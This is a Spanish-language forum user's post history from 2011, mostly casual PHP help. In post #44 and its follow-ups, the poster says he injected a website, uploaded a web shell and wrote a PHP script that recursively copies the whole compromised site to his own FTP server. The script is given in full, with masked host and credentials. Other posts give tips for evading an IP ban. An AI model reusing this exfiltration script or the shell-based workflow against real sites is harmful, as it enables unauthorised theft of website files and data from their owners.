Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - s00rk

#41
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bien código aunque si quisiera generar una password aleatoria utilizaría:

Código: php

<?php
$passwd = md5(sha1(mt_rand()));
echo $passwd;
?>


Y tambien generaría algo aleatorio y con buena longitud, saludos.

Si, es mas recomendable ya solo dentrias que obtener la logintud, y otra cosa es
$longitud == 0 deveria ser mas bien algo $logitud <= 0 , esto para hacer bien las cosas jeje
#42
Back-end / Re:Subir Directorios Completos por FTP
Junio 02, 2011, 07:28:38 PM
Si de hecho hehe de esta forma si son muchos archivos al final cae por exeso de tiempo o bueno a mi me manda error aunque haya puesto que no tuviera limite ahora hice algo diferente hehe con el mismo metodo, pero checare lo del zip :P
#43
Back-end / Re:Subir Directorios Completos por FTP
Junio 02, 2011, 12:18:00 PM
No, osea no me explique bien lo que paso esque subi tu shell y pues vi que no me podia bajar todos los archivos de una ni con el otro que me mencionaste ya que son bastantes archivos entonces lo que decidi fue crear mi servidor FTP local y usando ese codigo lo subi a la web con la shell y ya , ahorita se estan pasando los archivos a mi Servidor FTP hehe.

P.D. O no me explique bien , o no entendi muy bien tu comentario jiji :$
#44
Back-end / Subir Directorios Completos por FTP
Junio 02, 2011, 05:16:52 AM
Bueno ahorita son las 2:11 am hehe y pues entrado a una web que logre inyectar me fue muy bien y todo pero a la final pues como cualquier otro deceaba bajarme sus archivos pero como son bastantes no me los iva a bajar 1 por 1 con la shell , entonces decidi hacer un pequeño script que suba las carpetas complestas mediante FTP de mi propia PC y pues asi fue y nada mas eso seria todo paks! xD

So aqui mi codigo:

Código: php
<?php
function getDirectory( $path = '.', $level = 0, $c ){

    $ignore = array( 'cgi-bin', '.', '..' );

    $dh = @opendir( $path );
   
    while( false !== ( $file = readdir( $dh ) ) ){
   
        if( !in_array( $file, $ignore ) ){
           
            $spaces = str_repeat( '&nbsp;', ( $level * 4 ) );
           
            if( is_dir( "$path/$file" ) ){
           
                echo "<strong>$spaces $path/$file</strong><br />";
                Ftp($c,$path."/".$file,1);
                getDirectory( "$path/$file", ($level+1),$c );
           
            } else {
           
                echo "$spaces $path/$file<br />";
                Ftp($c,$path."/".$file,0);
           
            }
       
        }
   
    }
   
    closedir( $dh );

}

function Ftp($c,$l, $t)
{
    if($t == 1)
    {
        ftp_mkdir($c,$l);
    }else{
        ftp_put($c,$l,$l,FTP_BINARY);
    }
}

$hostname = "**************";
$ftp_user_name= "***";
$ftp_user_pass = "***";
$conn_id = ftp_connect ( $hostname );

$login_result = ftp_login ( $conn_id , $ftp_user_name , $ftp_user_pass );
if($conn_id && $login_result)
{
    ini_set('max_execution_time',38000);     
    getDirectory(".",0,$conn_id);
    ftp_close($conn_id);
}else{
    echo "Error de conexion";
}



?>

Sugerencias y cualquier cosa ahi me dicen n_n
#45
Si pusieras la web, podriamos ayudarte en eso hehe.
#46
Back-end / Re:[Taller de PHP]
Mayo 27, 2011, 10:33:15 PM
Es cierto hehehe, esque me fije en la imagen y sale que el codigo fuente dice
file///C:/ blablabla

Eso quiere decir que lo ejecuto directamente al navegador y no desde servidor que seria como dijo Snifer, asi que a como veo tendria dos errores ahi talvez.
#47
Back-end / Re:[Taller de PHP]
Mayo 27, 2011, 08:33:22 PM
Segun veo estas ejecutando el codigo directamente, ocupas descargarte un servidor como lo que es AppServer que a como yo veo es mejor.
#48
Eso lo entiendo, pero si es asi ¿Porque el codigo que he colocado anteriormente, funciona efectivamente como el que ha colocado HckDrk ?

Yo tambien al principio me uedaba o.O!? , pero ahora utilizo mas esa forma y no me ha dado problemas aun.
#49
Pues de hecho asi lo acabo de provar y me funciona, es por eso que preguntaba
#50
Que es mejor ? usar la funcion substr o simplemente indicar la posicion de la letra?

function text($text)
{
for($i 0$i strlen($text); $i++)
{
$ascii.= ord($text[$i]).",";
}
return substr($ascii,0,-1);
}
#51
Dudas y pedidos generales / Re:me podrìan ayudar
Mayo 16, 2011, 10:27:04 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si banearon tu IP hay algunas opciones


  • Esperar un tiempo ya la mayoria de los casos la IP cambia al dia siguiente
  • Reconectar tu modem, esto permite obtener una nueva IP
  • Cambiar el MAC Address de tu PC, ya que cada MAC se le asigna una IP diferente
No quiero sonar arrogante pero las 3 no son necesariamente correctas.

1-Muchos IPs son fijos, no todos son dinamicos
2-Leer la 1.
3-La mac adress es solo un numero que indica quien fabrico el aparato. Es como un numero de identificacion. Muchas computadoras diferentes pueden tener una MAC addrese diferentes y aun asi tener el mismo IP, como sucede en algunas redes WIFI donde el IP externo es el mismo para todos los aparatos pero el IP interno y la MAC son diferentes para todos.


Como dije la mayoria de los casos, ya que comunmente para tener IP fija ocupas contratarlo con tu proveedor de internet o como los VPS que en esos casos si es comun tener IP Fija, pero en la mayoria de casos donde he trabajado a excepcion de los VPS han usado o mas bien tenido IP Dinamica, hay que recordar tambien que en la mayoria de internet contratados del tipo internet residencial(hogares) son asignadas las IP dinamicamente y para empresas o servidores o ese tipo de casos es donde si es mas usual ver IP fija.

Sobre la MAC ahi si tienes razon si esta conectado mediante WIFI ahi si tendria que hacer lo del paso 1 o 2, claro donde su proveedor le de o asigne una IP Dinamica.

Edit: No es pelea solo aclaro como fue que lo pense que podria ser la situacion.
#52
Dudas y pedidos generales / Re:me podrìan ayudar
Mayo 16, 2011, 10:08:28 PM
Si banearon tu IP hay algunas opciones


  • Esperar un tiempo ya la mayoria de los casos la IP cambia al dia siguiente
  • Reconectar tu modem, esto permite obtener una nueva IP
  • Cambiar el MAC Address de tu PC, ya que cada MAC se le asigna una IP diferente